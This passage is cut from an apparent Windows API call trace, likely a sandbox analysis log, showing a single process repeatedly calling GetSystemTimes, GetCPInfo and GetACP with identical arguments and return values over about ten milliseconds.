lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.263] GetACP () returned 0x4e4 [0164.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.263] GetACP () returned 0x4e4 [0164.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.263] GetACP () returned 0x4e4 [0164.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.263] GetACP () returned 0x4e4 [0164.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.263] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.263] GetACP () returned 0x4e4 [0164.263] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.264] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.264] GetACP () returned 0x4e4 [0164.264] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.265] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.265] GetACP () returned 0x4e4 [0164.265] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.266] GetACP () returned 0x4e4 [0164.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.266] GetACP () returned 0x4e4 [0164.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.266] GetACP () returned 0x4e4 [0164.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.266] GetACP () returned 0x4e4 [0164.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.266] GetACP () returned 0x4e4 [0164.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.266] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.266] GetACP () returned 0x4e4 [0164.266] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.267] GetACP () returned 0x4e4 [0164.267] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.267] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.268] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.268] GetACP () returned 0x4e4 [0164.268] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.269] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.269] GetACP () returned 0x4e4 [0164.269] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.270] GetACP () returned 0x4e4 [0164.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.271] GetACP () returned 0x4e4 [0164.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.271] GetACP () returned 0x4e4 [0164.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.271] GetACP () returned 0x4e4 [0164.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.271] GetACP () returned 0x4e4 [0164.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.272] GetACP () returned 0x4e4 [0164.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.272] GetACP () returned 0x4e4 [0164.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.272] GetACP () returned 0x4e4 [0164.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.272] GetACP () returned 0x4e4 [0164.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.272] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.272] GetACP () returned 0x4e4 [0164.272] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0164.273] GetACP () returned 0x4e4 [0164.273] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0164.273] GetCPInfo (in: 